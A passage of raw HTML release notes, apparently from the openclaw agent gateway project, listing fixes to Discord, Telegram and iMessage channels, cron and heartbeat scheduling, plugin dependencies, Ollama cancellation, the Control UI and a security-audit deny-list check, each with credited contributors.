data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</li>
<li>Channels/Discord: fail startup closed when Discord cannot resolve the bot's own identity and keep mention gating active when only configured mention patterns can detect mentions, so the provider no longer continues with a missing bot id. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052146259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42219" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42219/hovercard" href="https://github.com/openclaw/openclaw/issues/42219">#42219</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077562944" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46856" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46856/hovercard" href="https://github.com/openclaw/openclaw/pull/46856">#46856</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090797830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49218/hovercard" href="https://github.com/openclaw/openclaw/pull/49218">#49218</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/education-01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/education-01">@education-01</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>Channels/Discord: split long CJK replies at punctuation and code-point-safe fallback boundaries so Discord chunking stays readable without corrupting astral characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4037445222" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38597" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38597/hovercard" href="https://github.com/openclaw/openclaw/issues/38597">#38597</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326906134" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71384" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71384/hovercard" href="https://github.com/openclaw/openclaw/pull/71384">#71384</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>.</li>
<li>TUI: keep the streaming watchdog alive across active tool/lifecycle proof-of-life, pause it during disconnects, and reload history after stale reconnect runs so long-running chats stop flipping to false idle or hanging on stale streaming. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291861236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69081" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69081/hovercard" href="https://github.com/openclaw/openclaw/issues/69081">#69081</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EenvoudJasper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EenvoudJasper">@EenvoudJasper</a>.</li>
<li>Browser/gateway: ignore Playwright dialog-close races from <code>Page.handleJavaScriptDialog</code> so browser automation no longer crashes the Gateway when a dialog disappears before Playwright accepts it. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041670448" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40067" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40067/hovercard" href="https://github.com/openclaw/openclaw/pull/40067">#40067</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/randyjtw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/randyjtw">@randyjtw</a>.</li>
<li>Cron/Gateway: defer missed isolated agent-turn catch-up out of the channel startup window, so overdue cron work cannot starve Discord or Telegram while providers connect after a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Heartbeat/cron: defer heartbeat turns while cron work is active or queued, add opt-in <code>heartbeat.skipWhenBusy</code> for subagent/nested lane pressure, and retry busy skips without advancing the schedule so local Ollama hosts do not run heartbeat and cron prompts concurrently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105361592" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50773" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50773/hovercard" href="https://github.com/openclaw/openclaw/issues/50773">#50773</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scottgl9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scottgl9">@scottgl9</a>.</li>
<li>Agents/thinking: honor configured model <code>compat.supportedReasoningEfforts</code> entries that include <code>xhigh</code>, so custom OpenAI-compatible provider refs expose and validate <code>/think xhigh</code> consistently across command menus, Gateway sessions, agent CLI, and <code>llm-task</code>. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087419491" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48904/hovercard" href="https://github.com/openclaw/openclaw/pull/48904">#48904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Milchstrassse/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Milchstrassse">@Milchstrassse</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wufunc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wufunc">@wufunc</a>.</li>
<li>Vercel AI Gateway: expose provider-owned <code>/think xhigh</code> for trusted OpenAI/Codex upstream refs and Claude adaptive thinking for Anthropic upstream refs, while leaving untrusted namespaced refs on base levels. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048650454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41561" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41561/hovercard" href="https://github.com/openclaw/openclaw/pull/41561">#41561</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zcg2021/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zcg2021">@Zcg2021</a>.</li>
<li>Plugins/runtime-deps: prune stale <code>openclaw-unknown-*</code> bundled runtime dependency roots during Gateway startup while keeping recent or locked roots, so old staging debris cannot keep growing across restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: include ten more root-package runtime dependencies (<code>@agentclientprotocol/sdk</code>, <code>@lydell/node-pty</code>, <code>croner</code>, <code>dotenv</code>, <code>jiti</code>, <code>json5</code>, <code>jszip</code>, <code>markdown-it</code>, <code>tar</code>, <code>web-push</code>) in <code>MIRRORED_CORE_RUNTIME_DEP_NAMES</code> so they are mirrored into the runtime-deps tree alongside <code>semver</code> and <code>tslog</code>, preventing <code>Cannot find package 'X'</code> failures from core dist code (for example <code>qmd-manager</code>, <code>cron/schedule</code>, <code>infra/archive</code>, <code>infra/push-web</code>, <code>infra/backup-create</code>, <code>process/supervisor/adapters/pty</code>) when no enabled extension owns the dependency. Adds a static drift guard test that scans <code>src/</code> for value imports of root-package deps and fails CI when one is missing from the mirror allowlist or extension-owned set. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348806638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74199" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74199/hovercard" href="https://github.com/openclaw/openclaw/issues/74199">#74199</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxpuppet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxpuppet">@maxpuppet</a>.</li>
<li>Ollama: compose caller abort signals with guarded-fetch timeouts for native <code>/api/chat</code> streams, so <code>/stop</code> and early cancellation still interrupt local Ollama requests that also carry provider timeout budgets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348337046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74133/hovercard" href="https://github.com/openclaw/openclaw/pull/74133">#74133</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Doctor/TTS: migrate legacy <code>messages.tts.enabled</code>, agent TTS, channel TTS, and voice-call plugin TTS toggles to <code>auto</code> mode during <code>openclaw doctor --fix</code>, matching the documented TTS config contract. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/logs: fall back to the configured Gateway file log when implicit loopback Gateway connections close or time out before or during <code>logs.tail</code>, so <code>openclaw logs</code> still works while diagnosing local-model Gateway disconnects. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347954374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74078" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74078/hovercard" href="https://github.com/openclaw/openclaw/issues/74078">#74078</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sakalaboator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sakalaboator">@sakalaboator</a>.</li>
<li>MCP/plugins: stringify non-array plugin tool results with chat-content coercion instead of default object stringification, so MCP callers receive useful JSON/text content from plugin tools. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory/QMD: make gateway-start QMD refresh opt-in via <code>memory.qmd.update.startup</code>, keep normal memory access lazy, preserve interactive file watching, and align watcher dependency/build ignores with QMD's scanner so cold gateway startup no longer imports or initializes QMD by default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codexGW/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codexGW">@codexGW</a>.</li>
<li>Channels/Discord: remove Discord-owned queued-run timeout replies through the shared channel lifecycle queue while preserving message ordering and compatibility timeout constants, so long Discord turns stay governed by session/tool/runtime lifecycle instead of channel fallback errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codexGW/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codexGW">@codexGW</a>.</li>
<li>Agents/tools: clamp <code>process.poll</code> waits to 30 seconds, advertise that cap in the tool schema, and honor abort signals while waiting, so long command polls cannot pin agent responsiveness after cancellation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK: add tracked Discord component-message helpers and a Telegram account-resolution compatibility facade, so existing plugins using those subpaths resolve while new plugins stay on generic channel SDK contracts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Shared labels: preserve Unicode combining marks and NFC-equivalent accented text in group/channel slug normalization so non-Latin labels no longer lose meaningful characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4185745477" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58932" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58932/hovercard" href="https://github.com/openclaw/openclaw/issues/58932">#58932</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4185851212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58942" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58942/hovercard" href="https://github.com/openclaw/openclaw/pull/58942">#58942</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186444405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58995" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58995/hovercard" href="https://github.com/openclaw/openclaw/pull/58995">#58995</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fengqing-git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fengqing-git">@fengqing-git</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Starhappysh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Starhappysh">@Starhappysh</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koen666/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koen666">@koen666</a>.</li>
<li>Channels/Telegram: include probed video width and height when sending regular Telegram videos, so portrait clips render with the correct orientation instead of being stretched by clients. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3950913740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/18915" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/18915/hovercard" href="https://github.com/openclaw/openclaw/pull/18915">#18915</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/storyarcade/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/storyarcade">@storyarcade</a>.</li>
<li>Docs/Hetzner: clarify that SSH tunnel access requires <code>AllowTcpForwarding local</code> before running <code>ssh -L</code>, so hardened VPS sshd configs do not block loopback Gateway access. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136710669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54557" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54557/hovercard" href="https://github.com/openclaw/openclaw/issues/54557">#54557</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136836006" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54564" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54564/hovercard" href="https://github.com/openclaw/openclaw/pull/54564">#54564</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141007846" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54954" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54954/hovercard" href="https://github.com/openclaw/openclaw/pull/54954">#54954</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/satishkc7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/satishkc7">@satishkc7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/blackstrype/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/blackstrype">@blackstrype</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Aftabbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Aftabbs">@Aftabbs</a>.</li>
<li>Agents/config: preserve authored <code>agents.defaults.params</code> and per-model <code>agents.defaults.models[].params</code> during narrowed internal config writes, so OpenAI transport overrides such as <code>transport: "sse"</code> and <code>openaiWsWarmup: false</code> are not stripped from <code>openclaw.json</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344027749" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73607" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73607/hovercard" href="https://github.com/openclaw/openclaw/issues/73607">#73607</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341750455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73428" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73428/hovercard" href="https://github.com/openclaw/openclaw/issues/73428">#73428</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quangtran88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quangtran88">@quangtran88</a>.</li>
<li>Agents/model config: resolve per-model extra params through canonical model keys while preserving legacy double-prefixed fallback entries, so provider-prefixed model ids such as <code>openrouter/auto</code> keep their configured runtime params. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066560428" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44319" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44319/hovercard" href="https://github.com/openclaw/openclaw/pull/44319">#44319</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HenryXiaoYang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HenryXiaoYang">@HenryXiaoYang</a>.</li>
<li>Gateway/shutdown: report structured shutdown warnings and HTTP close timeout warnings through <code>ShutdownResult</code> while preserving lifecycle hook hardening. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046867239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41296" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41296/hovercard" href="https://github.com/openclaw/openclaw/pull/41296">#41296</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/edenfunf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/edenfunf">@edenfunf</a>.</li>
<li>Control UI: keep Agents Overview and config-form select dropdowns on their configured value after options render while preserving inherited agent model placeholders. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042433661" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40352" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40352/hovercard" href="https://github.com/openclaw/openclaw/issues/40352">#40352</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4121542753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52948" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/52948/hovercard" href="https://github.com/openclaw/openclaw/pull/52948">#52948</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiaoquanidea/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiaoquanidea">@xiaoquanidea</a>.</li>
<li>Agents/exec: launch zsh, bash, and fish host exec shells with startup files suppressed while preserving existing PATH fallbacks, so daemon env is not overridden by shell startup files. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042016257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40200" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40200/hovercard" href="https://github.com/openclaw/openclaw/pull/40200">#40200</a>; fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041976066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40179" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40179/hovercard" href="https://github.com/openclaw/openclaw/issues/40179">#40179</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NewdlDewdl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NewdlDewdl">@NewdlDewdl</a>.</li>
<li>Plugins/QA: prebuild the private QA channel runtime before plugin gauntlet source runs so wrapper CPU/RSS measurements are not polluted by private QA dist rebuild work. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/QA: add a Kitchen Sink plugin gauntlet that installs the external package, checks command inventory, MCP tools, channel status, provider turns, gateway RSS, CPU, and fatal log anomalies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/config: reuse the bundled plugin alias scan within a single config normalization pass, so Kitchen Sink-style plugin configs no longer peg Gateway CPU by repeatedly rescanning bundled metadata before agent turns. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/channels: reject malformed runtime channel registrations that omit required config helpers before they can poison channel status. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>MCP/plugins: serialize raw plugin tool return values through the plugin-tools MCP bridge so Kitchen Sink-style tools no longer surface <code>undefined</code> content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/reload: bound default restart deferral and SIGUSR1 restart drain to five minutes while preserving explicit <code>deferralTimeoutMs: 0</code> indefinite waits, so stale active work accounting cannot block config reloads forever. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory: register the prompt-build hook with the configured recall timeout plus setup grace instead of the 150s maximum budget, so default memory recall cannot delay turn startup for multiple minutes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/readiness: include an <code>eventLoop</code> diagnostic block in local or authenticated <code>/readyz</code> responses with event-loop delay (p99 and max), event-loop utilization, CPU core ratio, and a <code>degraded</code> flag, so operators can see when slow startups or runaway turns stall the event loop. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/agents: schedule accepted agent runs after the accepted RPC frame has a chance to flush, so pre-turn prompt/context work is less likely to starve immediate <code>agent.wait</code> callers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/update: tolerate stale memory-runtime import failures during best-effort CLI process teardown, so <code>openclaw update</code> replacing hashed runtime chunks before the finalizer runs no longer surfaces as exit-time <code>Cannot find module</code> noise. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/channels logs: reuse the rolling log-file resolver so <code>openclaw channels logs</code> falls back to the active dated log across date boundaries without reading unrelated custom log files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056125824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42875" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42875/hovercard" href="https://github.com/openclaw/openclaw/issues/42875">#42875</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056258292" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42904/hovercard" href="https://github.com/openclaw/openclaw/pull/42904">#42904</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057041029" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43043" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43043/hovercard" href="https://github.com/openclaw/openclaw/pull/43043">#43043</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethanclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethanclaw">@ethanclaw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wdskuki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wdskuki">@wdskuki</a>.</li>
<li>CLI/update: skip tracked plugins disabled in config during post-update plugin sync before npm, ClawHub, or marketplace update checks, preserving their install records without failing the update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347036954" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73880" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73880/hovercard" href="https://github.com/openclaw/openclaw/issues/73880">#73880</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/islandpreneur007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/islandpreneur007">@islandpreneur007</a>.</li>
<li>Control UI: fix Peak Error Hours showing incorrect hourly rates when the browser's timezone observes DST, by storing hourly message counts with UTC date keys and using DST-aware <code>Date.getHours()</code> for local conversion. Also extract <code>accumulateMessageCounts</code> helper to reduce duplicated daily/hourly aggregation logic. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4092402816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49396" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49396/hovercard" href="https://github.com/openclaw/openclaw/pull/49396">#49396</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</li>
<li>iMessage: normalize known leading attributedBody corruption markers on sent-message echo text keys so delayed reflected echoes with U+FFFD/U+FFFE/U+FFFF/FEFF prefixes are dropped without collapsing interior text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197665190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59973" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59973/hovercard" href="https://github.com/openclaw/openclaw/issues/59973">#59973</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197722194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59980" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59980/hovercard" href="https://github.com/openclaw/openclaw/pull/59980">#59980</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214583433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62191" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62191/hovercard" href="https://github.com/openclaw/openclaw/pull/62191">#62191</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maguilar631697/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maguilar631697">@maguilar631697</a>.</li>
<li>Security/audit: recognize dangerous node command IDs as valid <code>gateway.nodes.denyCommands</code> entries, so audit only warns on real typos or unsupported patterns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163604946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56923" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56923/hovercard" href="https://github.com/openclaw/openclaw/pull/56923">#56923</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chziyue/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chziyue">@chziyue</a>.</li>
